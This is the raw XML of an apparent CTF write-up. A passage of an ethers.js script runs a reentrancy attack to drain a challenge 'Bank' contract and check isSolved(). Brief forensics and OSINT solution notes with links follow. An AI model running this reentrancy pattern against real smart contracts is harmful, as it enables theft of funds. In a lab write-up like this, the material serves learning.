      </w:r>
    </w:p>
    <w:p w14:paraId="67316455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maxFeePerGas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maxFeePerGas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maxFeePerGas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6CE3077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maxPriorityFeePerGas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maxPriorityFeePerGas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feeData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maxPriorityFeePerGas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5CA334D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gasLimit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7C2F858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value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amount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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46219EC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2D5D88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"Calling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attacker.attack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(...) - this will send the deposit and start reentrancy..."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30E11D9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attack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amount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txOverrides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4738320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tx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hash:"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hash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51E4BF30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168.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tx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wait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4F87838E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169.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"Attack transaction mined."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1CCEC6BD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43AB069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postBal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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provider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getBalance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BANK_ADDR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1327D493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lastRenderedPageBreak/>
        <w:t xml:space="preserve">172.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"Bank balance after:"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ethers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formatEther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postBal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"ETH"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A12D47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173.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3F6D6A2A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174.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const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solved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await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setup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isSolved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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638EA93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175.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isSolved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():"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solved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2FDB821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176.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if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solved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Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>✅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Success! Now go back to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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and run '3 - get flag'."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0A8DC972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177.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else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log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</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>❌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 xml:space="preserve"> Not solved. You may need to adjust deposit or investigate."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7C75CCD6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178.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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E40374F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179.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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1096BE6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180.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main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().</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>catch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err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=&gt;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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0213FE38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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">181. 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console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.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>error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(</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Fatal error:"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,</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> err</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540C5AAC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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">182. </w:t>
      </w:r>
      <w:r w:rsidRPr="003B27FD"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spellStart"/>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FF5864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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">183. </w:t>
      </w:r>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EEF859" w14:textId="77777777" w:rsidR="00641585" w:rsidRPr="003B27FD" w:rsidRDefault="006415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615570"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">184. </w:t>
      </w:r>
      <w:r w:rsidRPr="003B27FD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1268AC50" w14:textId="77777777" w:rsidR="00792708" w:rsidRDefault="00792708">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F89129C" w14:textId="19740175" w:rsidR="00587C0C" w:rsidRDefault="00587C0C" w:rsidP="00587C0C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc207539474"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Forensics</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="37EFE371" w14:textId="0AAC6C6A" w:rsidR="00D9228F" w:rsidRPr="00D9228F" w:rsidRDefault="00D9228F" w:rsidP="00D9228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4" w:name="_Toc207539475"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA Phone Tree</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="15BD2692" w14:textId="230B9C4D" w:rsidR="00D9228F" w:rsidRDefault="00D9228F" w:rsidP="00D9228F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F77EEC6" wp14:editId="2BB68F72">
            <wp:extent cx="3447619" cy="1076190"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="15226924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9246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6EBE" w14:textId="2F3D0845" w:rsidR="006514EC" w:rsidRPr="00D9228F" w:rsidRDefault="006514EC" w:rsidP="006514EC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5" w:name="_Toc207539476"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>datamosh</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F1AF4B2" w14:textId="7CB6AEEF" w:rsidR="006514EC" w:rsidRDefault="006514EC" w:rsidP="00D9228F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0761F3C6" wp14:editId="45B6060C">
            <wp:extent cx="2342857" cy="1485714"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="1198630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304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93D" w14:textId="640243AB" w:rsidR="006514EC" w:rsidRDefault="006514EC" w:rsidP="00D922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FE6C1" wp14:editId="37FEA136">
            <wp:extent cx="5267325" cy="2962275"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="824735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FEBE" w14:textId="5A13228C" w:rsidR="00CE248D" w:rsidRDefault="00CE248D" w:rsidP="00CE248D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6" w:name="_Toc207539477"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>QR</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="367EB2DE" w14:textId="49A1B4AC" w:rsidR="00CE248D" w:rsidRDefault="00CE248D" w:rsidP="00CE248D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B9D17A7" wp14:editId="1FB48C34">
            <wp:extent cx="3600000" cy="2695238"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="8754117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1174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778" w14:textId="31691412" w:rsidR="00B9483F" w:rsidRDefault="00B9483F" w:rsidP="00B9483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7" w:name="_Toc207539478"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>git predator</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="7BCF3895" w14:textId="74EC1B38" w:rsidR="00B9483F" w:rsidRPr="00B9483F" w:rsidRDefault="00B9483F" w:rsidP="00B9483F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9483F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Found part 1 here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00B9483F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/gitpreUwU/horse_racing/commit/825ca69471333d8b5d2979a6c5c7c56f27730f66</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="25F1D8B0" w14:textId="487A5E96" w:rsidR="00792708" w:rsidRPr="00792708" w:rsidRDefault="00B9483F" w:rsidP="00792708">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9483F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Found part 2 here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00B9483F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/gitpreUwU/horse_racing/compare/ffe38def52bafdd195dba8360caade99a43a9342...b36b948712bb3357cbcd36a9efdb9a2f990a0f49</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00488200" w14:textId="4F2BF32B" w:rsidR="00587C0C" w:rsidRDefault="00587C0C" w:rsidP="00587C0C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc207539479"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OSINT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="19D31CB6" w14:textId="23C84E6F" w:rsidR="0011677C" w:rsidRDefault="0011677C" w:rsidP="0011677C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19" w:name="_Toc207539480"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GeoGuessr3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="63D49D14" w14:textId="3D134AF6" w:rsidR="00B9483F" w:rsidRDefault="0011677C" w:rsidP="0011677C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="702E917E" wp14:editId="70A39F68">
            <wp:extent cx="3485714" cy="3666667"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="488346463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6463" name="Picture 1" descr="A screenshot of a map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3632" w14:textId="465D092F" w:rsidR="00B9483F" w:rsidRDefault="00B9483F" w:rsidP="00B9483F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20" w:name="_Toc207539481"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GeoGuessr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="77A64A5D" w14:textId="77777777" w:rsidR="00B9483F" w:rsidRDefault="00B9483F" w:rsidP="00B9483F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Instagram post: </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00EE44E8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.instagram.com/p/DMzEckzO40N/?img_index=8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="097758C1" w14:textId="6AF29761" w:rsidR="00B9483F" w:rsidRDefault="00B9483F" w:rsidP="00B948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D166C4" wp14:editId="4ADF2AE7">
            <wp:extent cx="3571429" cy="4685714"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="13401082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829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074" w14:textId="40C5FAB9" w:rsidR="00587C0C" w:rsidRDefault="003B27FD" w:rsidP="003B27FD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21" w:name="_Toc207539482"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="0A33E870" w14:textId="176A38AA" w:rsidR="003B27FD" w:rsidRDefault="003B27FD" w:rsidP="003B27FD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="610C87C8" wp14:editId="35617F94">
            <wp:extent cx="1219048" cy="714286"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="993978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78479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D7B" w14:textId="7A148055" w:rsidR="00126767" w:rsidRDefault="00126767" w:rsidP="00126767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22" w:name="_Toc207539483"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Osaka Expo Pavilion Quiz!</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="0B9E897A" w14:textId="263F9860" w:rsidR="00126767" w:rsidRPr="00126767" w:rsidRDefault="00126767" w:rsidP="00126767">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00126767">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="00126767">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.asahi.co.jp/expo70_archive/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3DD171FE" w14:textId="77777777" w:rsidR="00126767" w:rsidRPr="00126767" w:rsidRDefault="00126767" w:rsidP="00126767">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43970ECA" w14:textId="22998BBC" w:rsidR="00126767" w:rsidRPr="00126767" w:rsidRDefault="00126767" w:rsidP="001267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926836" wp14:editId="5F33BD0B">
            <wp:extent cx="3704762" cy="2600000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1307353616" name="Picture 1" descr="A screenshot of a quiz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53616" name="Picture 1" descr="A screenshot of a quiz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8D6" w14:textId="54916BCE" w:rsidR="00327E77" w:rsidRDefault="00327E77" w:rsidP="00327E77">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc207539484"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MYAKUMYAKU TOWER</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="1283EB7C" w14:textId="5FDC6375" w:rsidR="00327E77" w:rsidRPr="006F4D65" w:rsidRDefault="00327E77" w:rsidP="00327E77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4D65">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="006F4D65">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://en.tokyotower.co.jp/lightup/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0ED6CE51" w14:textId="104ADDBD" w:rsidR="00327E77" w:rsidRPr="00327E77" w:rsidRDefault="00327E77" w:rsidP="00327E77">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="232955F5" wp14:editId="5E0206A4">
            <wp:extent cx="5274310" cy="4135755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1014043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305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E57D" w14:textId="77777777" w:rsidR="00126767" w:rsidRPr="003B27FD" w:rsidRDefault="00126767" w:rsidP="003B27FD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00126767" w:rsidRPr="003B27FD">
      <w:footerReference w:type="default" r:id="rId2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1A194" w14:textId="77777777" w:rsidR="00D36D1E" w:rsidRDefault="00D36D1E" w:rsidP="00A16F3C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3C8F66A2" w14:textId="77777777" w:rsidR="00D36D1E" w:rsidRDefault="00D36D1E" w:rsidP="00A1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5891593"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="62595E01" w14:textId="324FDFB3" w:rsidR="00A16F3C" w:rsidRDefault="00A16F3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05B2318" w14:textId="77777777" w:rsidR="00A16F3C" w:rsidRDefault="00A16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A05FB" w14:textId="77777777" w:rsidR="00D36D1E" w:rsidRDefault="00D36D1E" w:rsidP="00A16F3C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="507BAE31" w14:textId="77777777" w:rsidR="00D36D1E" w:rsidRDefault="00D36D1E" w:rsidP="00A16F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A0"/>
    <w:rsid w:val="00025A1E"/>
    <w:rsid w:val="00042C6D"/>
    <w:rsid w:val="00086989"/>
    <w:rsid w:val="00095959"/>
    <w:rsid w:val="000A3088"/>
    <w:rsid w:val="000A4765"/>
    <w:rsid w:val="000B4275"/>
    <w:rsid w:val="000E1C99"/>
    <w:rsid w:val="000E7622"/>
    <w:rsid w:val="000F750A"/>
    <w:rsid w:val="000F7652"/>
    <w:rsid w:val="0011677C"/>
    <w:rsid w:val="00126767"/>
    <w:rsid w:val="00132EF1"/>
    <w:rsid w:val="00160418"/>
    <w:rsid w:val="0017226C"/>
    <w:rsid w:val="001747B1"/>
    <w:rsid w:val="0018145A"/>
    <w:rsid w:val="001C5997"/>
    <w:rsid w:val="00221125"/>
    <w:rsid w:val="00243F90"/>
    <w:rsid w:val="00254858"/>
    <w:rsid w:val="00277289"/>
    <w:rsid w:val="00291DF3"/>
    <w:rsid w:val="002A437D"/>
    <w:rsid w:val="002B2713"/>
    <w:rsid w:val="002D099B"/>
    <w:rsid w:val="002E1E37"/>
    <w:rsid w:val="002F6523"/>
    <w:rsid w:val="002F7D37"/>
    <w:rsid w:val="003208DB"/>
    <w:rsid w:val="00327E77"/>
    <w:rsid w:val="00361DEA"/>
    <w:rsid w:val="003651A1"/>
    <w:rsid w:val="003B27FD"/>
    <w:rsid w:val="003B42FC"/>
    <w:rsid w:val="003C0888"/>
    <w:rsid w:val="003C0D73"/>
    <w:rsid w:val="00417142"/>
    <w:rsid w:val="004175C0"/>
    <w:rsid w:val="00420F0D"/>
    <w:rsid w:val="004249F5"/>
    <w:rsid w:val="0042502E"/>
    <w:rsid w:val="00430F6F"/>
    <w:rsid w:val="00490371"/>
    <w:rsid w:val="00492779"/>
    <w:rsid w:val="00493DB6"/>
    <w:rsid w:val="004C0618"/>
    <w:rsid w:val="004E418B"/>
    <w:rsid w:val="005007A3"/>
    <w:rsid w:val="00505C3F"/>
    <w:rsid w:val="0054022A"/>
    <w:rsid w:val="00544317"/>
    <w:rsid w:val="00577526"/>
    <w:rsid w:val="005838A0"/>
    <w:rsid w:val="00587C0C"/>
    <w:rsid w:val="00595F42"/>
    <w:rsid w:val="005B371C"/>
    <w:rsid w:val="005B7359"/>
    <w:rsid w:val="00600DB1"/>
    <w:rsid w:val="00627824"/>
    <w:rsid w:val="00634119"/>
    <w:rsid w:val="00641585"/>
    <w:rsid w:val="006514EC"/>
    <w:rsid w:val="0065392B"/>
    <w:rsid w:val="0069368D"/>
    <w:rsid w:val="0069590F"/>
    <w:rsid w:val="006A2719"/>
    <w:rsid w:val="006F4D65"/>
    <w:rsid w:val="0071588B"/>
    <w:rsid w:val="007205E6"/>
    <w:rsid w:val="00731BDF"/>
    <w:rsid w:val="00792708"/>
    <w:rsid w:val="007A1EBF"/>
    <w:rsid w:val="007B4200"/>
    <w:rsid w:val="007D77C4"/>
    <w:rsid w:val="007E13A5"/>
    <w:rsid w:val="0084646D"/>
    <w:rsid w:val="00856A71"/>
    <w:rsid w:val="0088214D"/>
    <w:rsid w:val="008C03D5"/>
    <w:rsid w:val="008C41E7"/>
    <w:rsid w:val="009063AE"/>
    <w:rsid w:val="009166C5"/>
    <w:rsid w:val="009360FF"/>
    <w:rsid w:val="00960686"/>
    <w:rsid w:val="00964E9C"/>
